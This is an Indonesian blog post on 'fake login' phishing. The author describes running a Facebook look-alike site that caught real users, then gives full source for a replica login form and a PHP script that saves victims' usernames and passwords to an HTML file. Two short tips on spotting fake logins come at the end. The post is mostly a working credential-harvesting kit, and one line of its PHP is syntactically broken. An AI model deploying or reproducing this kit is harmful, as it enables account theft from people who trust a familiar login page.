Banyaknya pencurian sebuah akun dalam dunia cyber dapat dilakukan dengan berbagai cara. Salah satunya adalah fake login. Fake login merupakan sebuah teknik untuk membuat sebuah replika situs yang asli dan memberinya script tambahan untuk fetching (mengambil) informasi melalui form login.
Fake login sering dilakukan karena kemudahannya dalam memasang dan mengolah datanya :hottrit . Salah satu fake login yang pernah saya buat beralamat di http://www.faseboek.co.cc untuk user yang telah terjerat telah saya buatkan sebuah halaman baru yang ada dalam situs itu dengan nama http://www.faseboek.co.cc/****.html (alamat disamarkan, :cekpm !)
nah... kali ini saya membahas tentang bagaimana metode kerja fake login beserta source code nya.
Misalkan saya memiliki form login seperti ini:
| Enter your login information here | |
|---|---|
| Username | |
| Password | |
| Action | |
Berikut ini source code nya file "login.php":
<form action="writer.php" method="get"> <table border="0"> <tr> <th colspan="2">Enter your login information here</th> </tr> <tr> <td>Username</td> <td><input type="text" name="username" /></td> </tr> <tr> <td>Password</td> <td><input type="password" name="password" /></td> </tr> <tr> <td>Action</td> <td><input type="submit" value="Login" /><input type="reset" value="Reset form" /></td> </tr> </table> </form>
:bingung Maaf, saya berikan tabel untuk hasil output yang rapi.
Okelah... pada tag <form> di atas memberi perintah ke file writer.php untuk memproses input yang telah didapat. Kemudian method="get" merupakan metode untuk membawa data yang di dapat tersebut. Metode get membawa data dengan cara melampirkannya ke url, jadi alamatnya akan berubah menjadi
http://example.com/writer.php?username=<data username>&password=<data password>
apabila kita menggunakan metode post, maka data akan dibawa sebagai header.
okelah... mari kita lihat source code file writer.php
<?php
$temp = fopen('trapped.html', 'a');
fwrite($temp, "<pre>"
fwrite($temp, "username : " . $_GET['username']);
fwrite($temp, "<br>");
fwrite($temp, "password : " . $_GET['password']);
fwrite($temp, "<br><br></pre>");
fclose($temp);
exit;
?>bagian berwarna merah terlebut lah yang mana menuliskan hasil username yang didapat ke dalam file trapped.html. dan bagian biru memasukkan data password yang di dapat ke dalam file trapped.html. kita coba...
1. periksa alamat web, apakah alamat itu benar benar alamat asli situs tersebut.
2. periksa kode html dengan "view page source", cari form login, dan pastikan tidak ada action yang mencurigakan untuk memproses data yang kita masukkan tadi.
saya pikir cukup disini... bila terdapat pertanyaan, silahkan dilanjutkan di kotak komentar. :mikir
Posting Komentar
Give Ur eXPerience about this eXPerience...